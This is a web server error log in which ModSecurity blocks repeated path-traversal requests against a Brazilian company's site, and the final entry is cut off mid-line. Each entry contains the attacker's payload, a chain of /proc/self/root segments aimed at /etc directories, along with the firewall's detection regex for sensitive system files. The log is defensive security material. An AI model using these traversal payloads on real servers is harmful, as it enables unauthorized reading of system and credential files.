[Wed Mar 18 03:45:03.727502 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:46824] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ79a6ubjKNq_cu4ZVIgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:04.879275 2026] [:error] [pid 15826:tid 140411699963648] [client 74.7.243.128:44164] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ8OoXxyEfFpUF8f8rrgAAAUU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:45:05.325000 2026] [:error] [pid 17887:tid 140411691570944] [client 74.7.241.31:36716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/avahi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ8QkwaGbbGflqUZDRyAAAAMY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:10.775857 2026] [:error] [pid 11816:tid 140411582465792] [client 74.7.243.128:44172] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ9uw_le52K8_3pV2e_wAAAhM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:45:13.178458 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:54596] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ-cdf6f5d65gmYZSPXwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:45:14.514383 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:54598] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ-gkwaGbbGflqUZDR0AAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:45:15.794116 2026] [:error] [pid 30077:tid 140411683178240] [client 74.7.243.128:54614] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ-_u8EFLIOrSqIpvFdQAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:19.244672 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.243.128:54620] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpJ_9a6ubjKNq_cu4ZVKAAAA0w"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:21.686024 2026] [:error] [pid 26799:tid 140411691570944] [client 74.7.243.128:52940] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKAda6ubjKNq_cu4ZVKwAAA0Y"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:22.995875 2026] [:error] [pid 11816:tid 140411548894976] [client 74.7.243.128:52942] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKAuw_le52K8_3pV2fAwAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:45:26.365994 2026] [:error] [pid 11816:tid 140411574073088] [client 74.7.243.128:52954] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKBuw_le52K8_3pV2fBQAAAhQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:32.246399 2026] [:error] [pid 29882:tid 140411658000128] [client 74.7.243.128:52970] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKDEzinOy1jxa1j4fQ3wAAAQo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:45:33.570990 2026] [:error] [pid 17653:tid 140411565680384] [client 74.7.241.31:36724] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKDcdf6f5d65gmYZSPegAAAtU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:34.596427 2026] [:error] [pid 26799:tid 140411599251200] [client 74.7.243.128:33762] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKDta6ubjKNq_cu4ZVLwAAA1E"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:45:35.912842 2026] [:error] [pid 31803:tid 140411616036608] [client 74.7.243.128:33776] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKD-yqAr6etmhZHNp3NwAAAE8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:42.699359 2026] [:error] [pid 15051:tid 140411649607424] [client 74.7.243.128:33782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKFSmAPhZkrhU8w4ksvAAAAIs"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 03:45:44.063188 2026] [:error] [pid 17653:tid 140411733534464] [client 74.7.243.128:58130] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKGMdf6f5d65gmYZSPfgAAAsE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:45.415207 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.243.128:58132] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKGQkwaGbbGflqUZDR4AAAAMw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:50.003124 2026] [:error] [pid 29882:tid 140411632822016] [client 74.7.243.128:58144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKHkzinOy1jxa1j4fQ6AAAAQ0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:51.375706 2026] [:error] [pid 15051:tid 140411616036608] [client 74.7.243.128:49750] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKHymAPhZkrhU8w4ksvwAAAI8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Wed Mar 18 03:45:56.411656 2026] [:error] [pid 11816:tid 140411641214720] [client 74.7.243.128:49754] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php-fpm.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abpKJOw_le52K8_3pV2fCgAAAgw"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 03:45:57.703549 2026] [:error] [pid 17887:tid 140411733534464] [client 74.7.243.128:49760] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id 